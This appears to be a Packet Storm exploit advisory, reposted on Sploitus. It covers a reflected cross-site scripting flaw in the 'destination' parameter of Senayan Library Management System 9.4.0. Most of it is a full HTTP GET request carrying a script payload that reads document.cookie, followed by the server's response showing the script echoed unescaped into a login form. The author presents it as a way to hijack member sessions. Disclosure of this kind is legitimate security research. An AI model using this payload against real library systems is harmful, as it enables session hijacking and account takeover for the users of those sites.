Share
## https://sploitus.com/exploit?id=PACKETSTORM:170182
## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9
XSS-Reflected- PHPSESSID Hijacking
## Author: nu11secur1ty
## Date: 12.08.2022
## Vendor: https://slims.web.id/web/
## Software: https://slims.web.id/web/news/rilis-9.4.0/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0
## Description:
The value of the `destination` request parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmygl
was submitted in the destination parameter.
This input was echoed unmodified in the application's response. The
attacker can hijack the session of some users of the system.
## STATUS: HIGH Vulnerability
[+] Payload:
```GET
GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
[+] Response:
```HTTP/1
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 18:43:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30590
<!--
# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email: ido.alit@gmail.com
# @Date: 2018-01-23T11:25:57+07:00
# @Last modified by: Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Open Source Library Management System | Senayan</title>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-store, no-cache,
must-revalidate, post-check=0, pre-check=0"/>
<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>
<meta name="robots" content="noindex, follow"> <meta
name="description" content="Open Source Library Management System |
Senayan">
<meta name="keywords" content="Open Source Library Management System">
<meta name="viewport" content="width=device-width,
height=device-height, initial-scale=1">
<meta name="generator" content="SLiMS 9 (Bulian)">
<meta name="theme-color" content="#000">
<meta property="og:locale" content="en_US"/>
<meta property="og:type" content="book"/>
<meta property="og:title" content="Open Source Library Management
System | Senayan"/>
<meta property="og:description" content="Open Source Library
Management System"/>
<meta property="og:url"
content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>
<meta property="og:site_name" content="Senayan"/>
<meta property="og:image"
content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>
<meta name="twitter:card" content="summary">
<meta name="twitter:url"
content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>
<meta name="twitter:title" content="Open Source Library Management
System | Senayan"/>
<meta property="twitter:image"
content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>
<!-- // load bootstrap style -->
<link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">
<!-- // font awesome -->
<link rel="stylesheet"
href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">
<!-- Tailwind CSS -->
<link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">
<!-- Vegas CSS -->
<link rel="stylesheet"
href="template/default/assets/plugin/vegas/vegas.min.css">
<link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"
rel="stylesheet" type="text/css"/>
<!-- SLiMS CSS -->
<link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">
<!-- // Flag css -->
<link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">
<!-- // my custom style -->
<link rel="stylesheet"
href="template/default/assets/css/style.css?v=20221209-014320">
<link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>
<!-- // load vue js -->
<script src="template/default/assets/js/vue.min.js"></script>
<!-- // load jquery library -->
<script src="template/default/assets/js/jquery.min.js"></script>
<!-- // load popper javascript -->
<script src="template/default/assets/js/popper.min.js"></script>
<!-- // load bootstrap javascript -->
<script src="template/default/assets/js/bootstrap.min.js"></script>
<!-- // load vegas javascript -->
<script src="template/default/assets/plugin/vegas/vegas.min.js"></script>
<script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>
<!-- // load SLiMS javascript -->
<script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>
<script src="/slims9_bulian-9.4.0/js/gui.js"></script>
<script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script>
</head>
<body class="bg-grey-lightest">
<div class="result-search page-member-area">
<section id="section1 container-fluid">
<header class="c-header">
<div class="mask"></div>
<nav class="navbar navbar-expand-lg navbar-dark bg-transparent">
<a class="navbar-brand inline-flex items-center" href="index.php">
<svg
class="fill-current text-white inline-block h-8 w-8"
version="1.1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"
xml:space="preserve">
<path
d="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1
l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2
c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
C118.4,98.6,118.3,98.5,118.3,98.3z
M114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6
L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z
M95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>
</svg>
<div class="inline-flex flex-col leading-tight ml-2">
<h1 class="text-lg m-0 p-0">Senayan</h1>
</div>
</a>
<button class="navbar-toggler" type="button"
data-toggle="collapse" data-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent"
aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item ">
<a class="nav-link" href="index.php">Home</a>
</li><li class="nav-item ">
<a class="nav-link" href="index.php?p=libinfo">Information</a>
</li><li class="nav-item ">
<a class="nav-link" href="index.php?p=news">News</a>
</li><li class="nav-item ">
<a class="nav-link" href="index.php?p=help">Help</a>
</li><li class="nav-item ">
<a class="nav-link" href="index.php?p=librarian">Librarian</a>
</li> <li class="nav-item active">
<a class="nav-link" href="index.php?p=member">Member Area</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle
cursor-pointer" type="button" id="languageMenuButton"
data-toggle="dropdown" aria-haspopup="true"
aria-expanded="false">
<span class="flag-icon flag-icon-us"
style="border-radius: 2px;"></span>
</a>
<div class="dropdown-menu bg-grey-lighter
dropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">
<h6 class="dropdown-header">Select Language : </h6>
<a class="dropdown-item"
href="index.php?select_lang=ar_SA">
<span class="flag-icon flag-icon-sa mr-2"
style="border-radius: 2px;"></span> Arabic
</a> <a class="dropdown-item" href="index.php?select_lang=bn_BD">
<span class="flag-icon flag-icon-bd mr-2"
style="border-radius: 2px;"></span> Bengali
</a> <a class="dropdown-item" href="index.php?select_lang=pt_BR">
<span class="flag-icon flag-icon-br mr-2"
style="border-radius: 2px;"></span> Brazilian Portuguese
</a> <a class="dropdown-item" href="index.php?select_lang=en_US">
<span class="flag-icon flag-icon-us mr-2"
style="border-radius: 2px;"></span> English
</a> <a class="dropdown-item" href="index.php?select_lang=es_ES">
<span class="flag-icon flag-icon-es mr-2"
style="border-radius: 2px;"></span> Espanol
</a> <a class="dropdown-item" href="index.php?select_lang=de_DE">
<span class="flag-icon flag-icon-de mr-2"
style="border-radius: 2px;"></span> German
</a> <a class="dropdown-item" href="index.php?select_lang=id_ID">
<span class="flag-icon flag-icon-id mr-2"
style="border-radius: 2px;"></span> Indonesian
</a> <a class="dropdown-item" href="index.php?select_lang=ja_JP">
<span class="flag-icon flag-icon-jp mr-2"
style="border-radius: 2px;"></span> Japanese
</a> <a class="dropdown-item" href="index.php?select_lang=my_MY">
<span class="flag-icon flag-icon-my mr-2"
style="border-radius: 2px;"></span> Malay
</a> <a class="dropdown-item" href="index.php?select_lang=fa_IR">
<span class="flag-icon flag-icon-ir mr-2"
style="border-radius: 2px;"></span> Persian
</a> <a class="dropdown-item" href="index.php?select_lang=ru_RU">
<span class="flag-icon flag-icon-ru mr-2"
style="border-radius: 2px;"></span> Russian
</a> <a class="dropdown-item" href="index.php?select_lang=th_TH">
<span class="flag-icon flag-icon-th mr-2"
style="border-radius: 2px;"></span> Thai
</a> <a class="dropdown-item" href="index.php?select_lang=tr_TR">
<span class="flag-icon flag-icon-tr mr-2"
style="border-radius: 2px;"></span> Turkish
</a> <a class="dropdown-item" href="index.php?select_lang=ur_PK">
<span class="flag-icon flag-icon-pk mr-2"
style="border-radius: 2px;"></span> Urdu
</a> </div>
</li>
</ul>
</div>
</nav>
</header>
<div class="search" id="search-wraper"
xmlns:v-bind="http://www.w3.org/1999/xhtml">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto">
<div class="card border-0 shadow">
<div class="card-body">
<form class="" action="index.php" method="get"
@submit.prevent="searchSubmit">
<input type="hidden" name="search" value="search">
<input ref="keywords" value=""
v-model.trim="keywords"
@focus="searchOnFocus"
@blur="searchOnBlur" type="text" id="search-input"
name="keywords"
class="input-transparent w-100" autocomplete="off"
placeholder="Enter keyword to
search collection..."/>
</form>
</div>
</div>
<transition name="slide-fade">
<div v-if="show" class="advanced-wraper shadow
mt-4" id="advanced-wraper"
v-click-outside="hideSearch">
<p class="label mb-2">
Search by : <i
@click="hideSearch"
class="far fa-times-circle float-right
text-danger cursor-pointer"></i>
</p>
<div class="d-flex flex-wrap">
<a v-bind:class="{'btn-primary
text-white': searchBy === 'keywords', 'btn-outline-secondary':
searchBy !== 'keywords' }"
@click="searchOnClick('keywords')"
class="btn mr-2 mb-2">ALL</a>
<a v-bind:class="{'btn-primary
text-white': searchBy === 'author', 'btn-outline-secondary': searchBy
!== 'author' }"
@click="searchOnClick('author')"
class="btn mr-2 mb-2">Author</a>
<a v-bind:class="{'btn-primary
text-white': searchBy === 'subject', 'btn-outline-secondary': searchBy
!== 'subject' }"
@click="searchOnClick('subject')"
class="btn mr-2 mb-2">Subject</a>
<a v-bind:class="{'btn-primary
text-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy
!== 'isbn' }"
@click="searchOnClick('isbn')"
class="btn mr-2 mb-2">ISBN/ISSN</a>
<button class="btn btn-light mr-2 mb-2"
disabled>OR TRY</button>
<a class="btn btn-outline-primary mr-2
mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>
</div>
<p v-if="lastKeywords.length > 0" class="label
mt-4">Last search:</p>
<a
:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"
class="flex items-center justify-between
py-1 text-decoration-none text-grey-darkest hover:text-blue"
v-for="k in lastKeywords" :key="k"><span><i
class="far fa-clock
text-grey-dark mr-2"></i><span class="italic
text-sm">{{tmpObj[k].text}}</span></span><i
class="fas fa-angle-right
text-grey-dark"></i></a>
</div>
</transition>
</div>
</div>
</div>
</div>
</section>
<div class="container py-4">
<div class="row">
<div class="col-md-8">
<div>
<div class="tagline">Library Member Login</div>
<div class="loginInfo">Please insert your member ID
and password given by library system administrator. If you are
library's member and don't have a password yet, please contact library
staff.</div>
<div class="loginInfo">
<form
action="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"
method="post">
<div class="fieldLabel">Member ID</div>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)
## Proof and Exploit:
[href](https://streamable.com/dsl863)
## Time spent
`01:30:00`